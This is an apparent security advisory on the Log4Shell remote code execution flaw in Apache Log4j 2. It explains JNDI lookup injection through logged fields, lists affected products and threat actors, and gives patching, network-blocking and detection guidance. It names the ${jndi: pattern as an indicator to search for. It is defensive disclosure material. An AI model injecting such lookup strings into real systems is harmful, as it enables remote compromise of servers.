NAVANEM
CVE-2021-44228⚡ exploited in the wild

Log4Shell, unauthenticated RCE in Apache Log4j 2

Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Overview

CVE-2021-44228, dubbed "Log4Shell," is a critical unauthenticated remote code execution vulnerability in Apache Log4j 2, the de-facto logging library for the Java ecosystem. Disclosed in December 2021, it is considered one of the most widespread and severe vulnerabilities in computing history due to Log4j's ubiquitous presence across enterprise software, cloud services, and embedded systems.

Technical Details

Apache Log4j2 versions 2.0-beta9 through 2.14.1 contain a dangerous feature where JNDI (Java Naming and Directory Interface) lookups are performed on special ${jndi:...} patterns found within logged strings. When message lookup substitution is enabled, the library expands these patterns by contacting arbitrary LDAP, RMI, or other JNDI endpoints.

An attacker who can inject any string into an application's logs-through HTTP headers like User-Agent or Referer, form fields, chat messages, username fields, or webhook payloads-can craft a malicious payload pointing to an attacker-controlled server. The vulnerable application will then fetch and execute arbitrary Java classes from that server.

The attack works across all JDK versions and can traverse multiple application layers, meaning even internal back-office tools can be compromised if they log data originating from untrusted sources.

Impact

The impact is catastrophic due to Log4j's presence in thousands of products including VMware vCenter, Veeam Backup & Replication, ConnectWise Automate, Atlassian Confluence/Jira, ManageEngine, Cisco IOS XR webUI, SolarWinds, and Splunk, plus countless custom Java applications.

Within 48 hours of disclosure, mass scanning began worldwide. Within one week, cryptominers, Cobalt Strike loaders, and Conti ransomware affiliates were actively exploiting the vulnerability. State-aligned threat actors including APT35, APT41, and Hafnium integrated Log4Shell into their toolchains. Confirmed breaches affected the Belgian Ministry of Defense, the Quebec government, and numerous other organizations.

Mitigation

  1. Inventory all Java workloads and identify Log4j versions by checking log4j-core-*.jar filenames
  2. Patch to version 2.17.1 or later-versions 2.15.0 and 2.16.0 had bypass vulnerabilities (CVE-2021-45046, CVE-2021-45105)
  3. Block outbound LDAP/RMI/DNS traffic from server zones to the Internet, as JNDI exfiltration can occur over DNS
  4. Network segmentation to limit lateral movement if exploitation occurs

Detection

Search all logs for ${jndi: patterns appearing in User-Agent headers, Referer fields, form inputs, and application logs. This indicator applies to past and ongoing exploitation attempts. Monitor for unusual outbound connections to LDAP (port 389/636) or RMI (port 1099) endpoints from Java applications.